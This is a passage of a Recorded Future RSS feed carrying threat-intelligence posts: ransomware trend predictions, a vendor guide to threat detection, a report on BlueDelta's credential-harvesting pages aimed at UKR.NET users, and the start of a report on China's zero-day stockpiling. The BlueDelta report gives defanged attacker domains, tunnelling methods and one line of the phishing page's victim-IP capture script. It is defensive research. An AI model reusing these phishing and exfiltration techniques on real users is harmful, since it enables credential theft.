        <p>For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.</p>
        <p>This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.</p>
        <h2>Trend 1: DDoS services return to the RaaS model</h2>
        <p>With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.</p>
        <p>The newly formed <a href="https://blog.talosintelligence.com/new-chaos-ransomware/"></a><a href="https://blog.talosintelligence.com/new-chaos-ransomware/">Chaos ransomware group</a> (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.</li>
        </ul>
        <h2>Trend 2: Insider recruitment attempts are accelerating</h2>
        <p>Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.</p>
        <p>The most public example came earlier this year when a ransomware group attempted to recruit a <a href="https://www.bbc.com/news/articles/c3w5n903447o"></a><a href="https://www.bbc.com/news/articles/c3w5n903447o">reporter at the BBC</a>. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.</li>
        </ul>
        <h2>Trend 3: Gig workers as unwitting attack vectors</h2>
        <p>According to a recent <a href="https://www.ic3.gov/CSA/2025/250523.pdf">FBI advisory</a>, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.</p>
        <p>The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.</li>
        </ul>
        <h2>Looking ahead: One big prediction for 2026</h2>
        <p>The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.</p>
        <p>Recorded Future believes that 2026 will be the first year the number of <em>new</em> ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.</p>
        <h2>The bottom line: Strengthen your ransomware defenses</h2>
        <p>Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:</p>
        <ul>
          <li><strong>Explore Recorded Future's</strong> <strong><a href="https://www.recordedfuture.com/ko/use-case/ransomware"></a><a href="https://www.recordedfuture.com/ko/use-case/ransomware">Ransomware Mitigation Solution</a></strong> for end-to-end visibility into your ransomware exposure across the attack lifecycle.</li>
          <li><strong>Read our latest</strong> <strong><a href="https://www.recordedfuture.com/ko/research/insikt-group"></a><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group® research</a></strong> on ransomware trends, threat actor TTPs, and emerging attack vectors.</li>
          <li><strong>Download the</strong> <strong><a href="https://www.recordedfuture.com/ko/resources/guides/proactive-ransomware-mitigation"></a><a href="https://www.recordedfuture.com/ko/resources/guides/proactive-ransomware-mitigation">Proactive Ransomware Mitigation eBook</a></strong> for actionable strategies to identify, investigate, and prioritize cyber threats.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_13d33e30a4d6ff2bf805413e36ff4532517bc417e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Threat Detection Tools & Best Practices]]></title>
            <link>https://www.recordedfuture.com/ko/blog/digital-threat-detection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/digital-threat-detection</guid>
            <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore digital threat detection tools and learn best practices to identify, analyze, and neutralize digital threats before they impact your business.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Digital threats now originate far beyond the perimeter.</strong> Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.</li>
          <li><strong>Context is the foundation of effective detection.</strong> Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.</li>
          <li><strong>Modern digital threat detection (DTD) requires visibility across the external digital environment.</strong> The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.</li>
          <li><strong>Analysts need automation to keep pace.</strong> High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.</li>
          <li><strong>Recorded Future operationalizes intelligence at enterprise scale.</strong> The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.</li>
        </ul>
        <h2>Why Digital Threat Detection Requires a New Approach</h2>
        <p>Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:</p>
        <ul>
          <li>High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.</li>
          <li>Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.</li>
          <li>Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.</li>
          <li>Alert fatigue from manually sifting through noise to find high-risk signals.</li>
        </ul>
        <p>As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.</p>
        <p>Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.</p>
        <p>The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.</p>
        <h2>Understanding the Modern Digital Threat Landscape</h2>
        <p>To <a href="https://www.recordedfuture.com/ko/blog/digital-risk-protection-overview">build an effective digital threat detection program</a>, security teams must understand where modern threats originate and how attackers operate.</p>
        <h3>Key Threat Vectors Beyond the Perimeter</h3>
        <h4>Leaked credentials and account takeover attempts (stolen identities)</h4>
        <p>Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.</p>
        <h4>Brand impersonation, domain spoofing, and phishing campaigns</h4>
        <p>Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.</p>
        <h4>Vulnerability exploitation and zero-day threats in the external attack surface</h4>
        <p>Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.</p>
        <h4>Dark web chatter and early warning signs of planned ransomware or DDoS attacks</h4>
        <p>Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.</p>
        <h2>Why an Intelligence-Driven Approach is Better</h2>
        <p>For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.</p>
        <p>Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the <a href="https://www.recordedfuture.com/ko/blog/digital-risk-management-strategies">broader digital ecosystem</a>. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.</p>
        <p>The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.</p>
        <h2>Essential Digital Threat Detection Tools and Technologies</h2>
        <p>Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.</p>
        <h3>Threat Intelligence Platforms: The Engines of Context</h3>
        <p>No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.</p>
        <p>Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:</p>
        <ul>
          <li>Open web reporting</li>
          <li>Underground forums</li>
          <li>Dark web marketplaces</li>
          <li>Malware sandboxes</li>
          <li>Threat feeds</li>
          <li>Researcher data</li>
        </ul>
        <p>Once the data is normalized, the platform enriches it with context, such as:</p>
        <ul>
          <li>Relationships between indicators</li>
          <li>Associations with known threat actors</li>
          <li>Infrastructure reuse</li>
          <li>Activity targeting specific industries or regions</li>
        </ul>
        <p>This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.</p>
        <h3>Security Orchestration, Automation, and Response (SOAR)</h3>
        <p>While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.</p>
        <p>Key SOAR capabilities include:</p>
        <ul>
          <li><strong>Enriching alerts</strong> with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)</li>
          <li><strong>Blocking malicious indicators</strong> across firewalls, endpoints, cloud environments, and identity systems</li>
          <li><strong>Initiating takedown workflows</strong> for harmful domains or impersonation infrastructure</li>
          <li><strong>Coordinating actions</strong> across multiple security tools to ensure a unified response</li>
          <li><strong>Documenting each step</strong> of the investigation for reporting and compliance</li>
        </ul>
        <p>By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.</p>
        <h3>Endpoint Detection and Response (EDR) &amp; Security Information and Event Management (SIEM) Integration</h3>
        <p>EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.</p>
        <p>EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.</p>
        <p>Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.</p>
        <p>Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.</p>
        <h2>Overcoming the Analyst’s Biggest Pain Points</h2>
        <p>Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.</p>
        <h3>The Drain of Alert Fatigue and False Positives</h3>
        <p>High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.</p>
        <p>The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.</p>
        <h3>The Blind Spots of External Risk</h3>
        <p>Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.</p>
        <p>These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.</p>
        <h2>Recorded Future: Operationalizing Digital Threat Intelligence at Scale</h2>
        <p>Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.</p>
        <h3>Real-Time Context from the Intelligence GraphⓇ</h3>
        <p><a href="https://www.recordedfuture.com/ko/platform/intelligence-graph">The Intelligence GraphⓇ</a> addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:</p>
        <ul>
          <li>Open web</li>
          <li>Dark web marketplaces</li>
          <li>Malware repositories</li>
          <li>Technical feeds</li>
          <li>Network telemetry</li>
          <li>Closed underground forums</li>
        </ul>
        <p>No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.</p>
        <h3>Comprehensive Digital Risk Protection for External Threats</h3>
        <p>Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.</p>
        <p>Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.</p>
        <h3>Accelerating Time-to-Action through Integrated Intelligence</h3>
        <p>Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.</p>
        <p>An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.</p>
        <p>Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.</p>
        <p>This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&amp;CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.</p>
        <h3>Smarter, Faster Security Decisions</h3>
        <p>Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.</p>
        <p>By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.</p>
        <p>These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.</p>
        <p>Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how <a href="https://www.recordedfuture.com/ko/use-case/digital-risk">Recorded Future</a> can support your Digital Threat Detection strategy.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14639da492947ba40cd78b2b341750064fc2e01ca.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[BlueDelta’s Persistent Campaign Against UKR.NET]]></title>
            <link>https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Russia’s BlueDelta targets UKR.NET users with advanced credential-harvesting campaigns, evolving tradecraft, and multi-stage phishing techniques.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was July 30, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “<a href="https://www.recordedfuture.com/ko/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns</a>,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.</p>
        <p>Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.</p>
        <p>BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.</li>
          <li>The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.</li>
          <li>BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.</li>
          <li>Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.</li>
          <li>The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in <strong>Figure 1</strong>. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1aedf1a1ebaf322a2b9cea5d91b9c34059f89d679.png?width=750&amp;format=png&amp;optimize=medium" width="1575" height="1189" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)</em></p>
        <p>The malicious UKR.NET page had very similar functionality to that previously <a href="https://www.recordedfuture.com/ko/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">observed</a> by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, <em>kfghjerrlknsm[.]line[.]pm[:]11962</em>, as per <strong>Figure 2</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11071d6fe28c7569a9a99c22d79c151693b79be2a.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1312" height="1600" />
        </p>
        <p><em><strong>Figure 2:</strong></em> <em>UKR.NET credential capture page JavaScript (Source: Recorded Future)</em></p>
        <p>The <em>line[.]pm</em> apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.</p>
        <p>At the time of analysis, the domain resolved to the IP address <em>18[.]157[.]68[.]73</em>, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.</p>
        <p>The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure <a href="https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF">in early 2024</a>.</p>
        <p>BlueDelta added new functionality to the page hosted on <em>kfghjerrlknsm[.]line[.]pm</em> to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in <strong>Figure 3</strong>.</p>
        <pre><code>var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
</code></pre>
        <p><em><strong>Figure 3:</strong></em> <em>Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)</em></p>
        <p>Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.</p>
        <p>On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain <em>5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net</em>.</p>
        <p>The apex domain <em>serveo[.]net</em> is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.</p>
        <p>In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain <em>jkbfgkjdffghh[.]linkpc[.]net</em>, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the <em>linkpc[.]net</em> domain resolved to suspected ngrok IP address <em>3[.]67[.]15[.]169</em>.</p>
        <p>Additionally, BlueDelta added new first-stage redirection domains for two of the pages: <em>ukraine[.]html-5[.]me</em> and <em>ukrainesafe[.]is-great[.]org</em>. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains <em>html-5[.]me</em> and <em>is-great[.]org</em> are owned by the free hosting company Byet Internet Services.</p>
        <p>On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL <em>run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050</em>. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, <em>jkbfgkjdffghh[.]linkpc[.]net:17461,</em> as shown in <strong>Figures 4 and 5</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d3acfd7246af4bd0b054c43368a2c03afecd6e12.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1330" height="1600" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10c10db1d8d09ea494c21cd484e6f0e6adeccfc34.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1147" height="1600" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript code used to capture credentials (Source: Recorded Future)</em></p>
        <p>During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in <strong>Figure 6</strong>, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15c6aeca393c16eb8df14a4a9b2d04fd98ce25d63.png?width=750&amp;format=png&amp;optimize=medium" width="809" height="482" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages</em></p>
        <p><em>(Source: Recorded Future)</em></p>
        <p>Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:</p>
        <ul>
          <li>doads[.]org</li>
          <li>in[.]run</li>
          <li>t[.]ly</li>
          <li>tiny[.]cc</li>
          <li>tinyurl[.]com</li>
          <li>linkcuts[.]com</li>
        </ul>
        <p>In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_11203fd322f018c8d0b5f9b3c85f34cb897128ad0.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[China’s Zero-Day Pipeline: From Discovery to Deployment]]></title>
            <link>https://www.recordedfuture.com/ko/research/china-zero-day-pipeline</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/china-zero-day-pipeline</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[China is consolidating cyber power through zero-days. Explore how state control of vulnerabilities enables long-term strategic advantage.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <ul>
          <li>China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, <strong>signaling a continued effort toward stockpiling exploits</strong> for strategic or military advantage.</li>
          <li>The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) <strong>give the Chinese state first access and control over zero-days.</strong> Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.</li>
          <li>The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s <strong>consolidation of cyber capabilities</strong>, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.</li>
          <li>Defenders should adopt an “assume breach” posture and build for containment, implementing <strong>zero trust and layered defenses</strong> to limit attacker movement and impact after an exploit.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15e000151ffba5a4ff78475507202df421f0d8641.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="957" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>How China stockpiles vulnerabilities</em> <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3>Zero-Days as Strategic Weapons</h3>
        <p>A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.</p>
        <p>Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the <a href="https://trumpwhitehouse.archives.gov/sites/whitehouse.gov/files/images/External%20-%20Unclassified%20VEP%20Charter%20FINAL.PDF">Vulnerabilities Equities Process (VEP)</a>, which is designed to be transparent and generally favors disclosure to help maintain internet security.</p>
        <h3>China’s Vulnerability Management Regime</h3>
        <p>China’s vulnerability management system is <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">centralized</a> and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.</p>
        <ul>
          <li><strong>Mandatory Reporting</strong></li>
        </ul>
        <p>The RMSV (2021) <a href="https://www.chinalawtranslate.com/en/product-security-vulnerabilites/">requires</a> that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The <a href="http://www.npc.gov.cn/englishnpc/c2759/c23934/202112/t20211209_385109.html">Data Security Law</a> (DSL) and <a href="https://www.chinalawtranslate.com/en/national-intelligence-law-of-the-p-r-c-2017/#gsc.tab=0">National Intelligence Law</a> (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.</p>
        <ul>
